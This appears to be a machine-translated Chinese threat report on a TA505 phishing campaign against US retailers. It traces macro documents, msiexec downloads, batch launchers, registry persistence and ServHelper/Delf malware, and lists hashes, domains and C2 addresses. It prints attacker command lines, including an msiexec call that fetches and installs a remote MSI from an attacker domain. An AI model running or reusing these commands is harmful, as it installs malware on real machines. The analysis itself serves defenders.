TA505是Proofpoint一致追踪的网络犯罪组织，主要针对全球金融机构进行攻击活动，进行以窃密资金为目的经济犯罪活动，以传播Dridex、Locky等恶意样本而臭名昭著。后奇安信研究发现，该组织可能来源于东欧地区以俄语为主要语言的国家。

概述

12月中旬，CyberIn发现了针对美国大型零售商和其他零售商的电子邮件鱼叉式网络钓鱼活动，此攻击活动使用了几个恶意软件系列，例如Gussdoor，Xrat和Vimditator等。网络钓鱼文档包含目标组织徽标。该网络钓鱼文档是一个启用宏的文档，它执行和下载第二阶段到受害者的机器。

活动细节

在活动期间，观察到威胁演员发送了几个网络钓鱼文档，一份文件（MD5：e377557c8f35beeb050370c4479bcb04）.一旦执行，宏执行以下命令连接到hxxp:// local365office.com/content /q  ，使用/q指定执行的文件

msiexec.exe 下载执行 MSI文(MD5:69f09ef629df82c8498328272b569160) 

MSI程序将另一个二进制文件释放到磁盘到以下目录c：\ windows \ installer \ msi2adc.tmp（MD5：d7a3237eaeeda49aadb08e2d2b77544d）

然后将以下文件释放到appdata \ local \ temp \ director

exit.exe启动后使用cmd启动i.cmd

i.cmd执行ping命令，其中-n 3表示对cloudflare.com的回应请求数

-w 3000表示超时时间为3000毫秒。 恶意软件会检查互联网

连接。 如果ping请求成功由IF％ERRORLEVEL％NEQ 1指示，则检查该请求

命令执行成功没有错误，然后更改以前释放的syst.dll文件的名称，

将其名称更改为7zinstall.exe，然后运行另一个ping命令到cloudfalre.com，如果成功，执行7zinstall.exe提取自身

密码为3KPnoNJ3ReME4bEU5W9APkKS5ErkR3tNRT。 7zinstall.exe然后提取以下文件到以下目录C：\ ProgramData \ Microtik：

解压缩文件后，7zinstall.exe使用ShellExecuteEX执行exit.exe

exit.exe继续使用cmd执行i.cmd，i.cmd内容如下

i.cmd在启动项下设置“Microtik”的注册表名称，值为

c：\ ProgramData \ Microtik \ winserv.exe，然后启动

winserve.exe。winserv.exe尝试连接到位于德国的C2服务器

89.144.25.32:5655 

在域local365office.com上进行分析时，它位的IP地址88.99.180.3上

。检查ISP IP信息，它显示它属于称为Oleg Gorshkov的ISP。信息仅限139个其他域名。其中一个域名是office365onlinehome.com，与

local365office.com相似。在分析office365onlinehome.com时，它会显示恶意文档（MD5：a7194d55e60cbfa69a5b31d039182882）正在与该域通信，并带有共同的诱饵

该文档很清楚与上述网络钓鱼文档有关。对恶意文档的进一步分析显示类似的TTP执行msiexec.exe具有以下内容

命令行工件msiexec.exe next = back error = shutdown / i

http://office365onlinehome.com/host32 / q OnChange =“c：\ windows \ system32”

 然后通过端口80连接到office365onlinehome.com并下载msi

安装程序（MD5：f3014c7ac2848ca542e6ba16e20452f4）到AppData \ Local \ Temp \目录，一旦执行，msi安装程序将释放以filemsi2a01.tmp（MD5：

c4a201a6f5e07136923f824bda4cd54f）到以下目录C：\ Windows \ Installer \和执行文件。 此文件用于由Proofpoint发布的另一个称之为ServHelper1的恶意程序

，它会在AppData \ Local \ Temp \目录中创建以下文件

然后使用以下命令行参数启动wscript

vbs脚本充当启动器并执行zxa.bat

zxa.bat充当启动器并使用rundll32.exe执行helpobj.dat，helpobj.dat是一个PECompact

打包的DLL文件，俗称Win32.Trojan.Delf。 这个恶意软件系列是一个通用木马通常用于窃取受害者的信息。 该文件使用合法的代码签名证书进行签名

寻找NEON CRAYON LIMITED的证书名称NEON CRAYON LIMITED显示私营企业

公司位于英国伦敦Evering Road 189a Evering Road Flat 1,19a，负责电脑维修服务方面，位置如图

该公司签名证书被盗用于给恶意软件签名

结论

此活动再次显示了攻击者如何提高隐藏的混淆功能

他们的多层执行攻击希望逃避检测。

此活动还表明，利用商品恶意软件可以带来强大的冲击力

提供复杂的能力，是一个有动力的手中的恐吓武器

对手。

​